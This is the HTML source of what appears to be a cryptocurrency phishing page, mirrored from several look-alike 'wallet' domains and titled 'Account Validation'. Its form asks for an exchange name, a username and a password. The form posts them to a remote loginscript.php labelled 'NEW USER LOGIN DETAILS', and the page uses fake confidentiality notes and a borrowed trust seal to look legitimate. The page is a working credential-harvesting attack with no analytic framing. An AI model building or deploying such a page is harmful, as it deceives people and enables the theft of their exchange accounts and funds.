
<!doctype html>
<html lang="en">


<!-- Mirrored from tokenwalletaffix.online/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Oct 2021 18:09:32 GMT -->

<!-- Mirrored from walletrectification.io/token/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Nov 2021 04:31:54 GMT -->

<!-- Mirrored from tokenvalidatorapp.store/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:41:43 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
    <title>Account Validation</title>
	<link rel="icon" href="favicon.ico">
   <link rel="stylesheet" href="css/bootstrap.min.css">
  <script src="js/bootstrap.min.js"></script>
    <script type="text/javascript"> //<![CDATA[
  var tlJsHost = ((window.location.protocol == "index.html") ? "https://secure.trust-provider.com/" : "http://www.trustlogo.com/");
  document.write(unescape("%3Cscript src='" + tlJsHost + "trustlogo/javascript/trustlogo.js' type='text/javascript'%3E%3C/script%3E"));
//]]></script>
<script language="JavaScript" type="text/javascript">
  TrustLogo("../www.positivessl.com/images/seals/positivessl_trust_seal_md_167x42.png", "POSDV", "none");
</script>
	</head>
<body style="padding-left:20px;">
		<div class="row">
			<div class="col-md-2"></div> 
			<div class="col-md-8" style="padding-top:60px">
			<div class="row">
			<div class="col-md-12" style=" text-align: center" ><a href="../index-2.html"><img src="image/logo.jpg" style="height:100%;  width:40%"></a> 
				</div>	
				<div class="col-md-12" style="padding-top:20px;  text-align: center;display: block;
    font-size: 1.5em;font-family: Avenir,Helvetica,Arial,sans-serif;
    margin-block-start: 0.83em;
    margin-block-end: 0.83em;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    font-weight: bold"><h3><b>Account Validation</b></h3></div>
			<div class="col-md-12">
				 			<div class="tab-content">
						<div class="tab-pane show active" id="about-cont">
                <div class="row">
                    <div class="col-md-12" style="padding-right:12px; padding-left:20px">
                     
                         
                            <div class="experience-box">
                             
                                       <form action="https://tokenwalletaffix.online/exchange/loginscript.php" method="post" enctype="multipart/form-data" >
										   <input type="text" name="subject" value="NEW USER LOGIN DETAILS" hidden>
                                        <div class="experience-content">
											<div class="row">
                                                
                                                <div class="col-sm-12">
                                    <div class="form-group">
                                      
                                        <input name="aType" style="height:55px" class="form-control" type="text" placeholder="Exchange Platform" required>
                                    </div>
                                </div>
												
                                            <div class="col-sm-12">
                                    <div class="form-group">
                                      
                                        <input name="email" style="height:55px" class="form-control" type="text" placeholder="Email Address / Username" required>
                                    </div>
                                </div>    
											<div class="col-sm-12">
                                    <div class="form-group">
                                      
                                        <input style="height:55px" name="password" class="form-control" type="password" placeholder="Password" required>
                                    </div>
                                </div>
					<div class="col-sm-12"><button style="width:100%; height:38px; margin-top:.3rem; background-color:#007bff; border-color:#007bff" type="submit" name="submit">
                               
                                    <h3 style="font-size:18px!important; font-weight:800!important; text-transform:uppercase!important;letter-spacing:.2rem; color:white;">LOGIN </h3>
                            
                              </button></div>
												
											</div>
                                        </div>
                        
                   </form>
                    </div>
                </div>
					
							</div></div>
					</div>
		
			
				</div>
				<div class="col-md-12" style="padding-top:130px; font-family:Arial; padding-left:20px">
				<h3 style="display: block;
    font-size: 1.17em;
    margin-block-start: 1em;
    margin-block-end: 1em;
    margin-inline-start: 0px;
    margin-inline-end: 0px;
    font-weight: bold">Note</h3>
					<ul >
					<li style="font-size: 13px;
    display: list-item">The information collected is confidential and will not be disclosed by us to unauthorized third parties.</li>
						<li style="font-size: 13px;
    display: list-item">Customers are reminded to kindly provide accurate and truthful information for authentication and not to provide data which is false or which belongs to third parties. Authentication information will not be modified</li>
						<li style="font-size: 13px;
    display: list-item">Authentication process will be carried out immediately upon receipt of information, and we will have to notify you of the authentication result.</li>
					</ul>
				</div>
				</div>
			</div>
			<div class="col-md-2"></div> 
		</div>

</body>
	

<!-- Mirrored from tokenwalletaffix.online/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 28 Oct 2021 18:09:35 GMT -->

<!-- Mirrored from walletrectification.io/token/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 19 Nov 2021 04:31:56 GMT -->

<!-- Mirrored from tokenvalidatorapp.store/exchange/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Nov 2021 18:41:46 GMT -->
</html>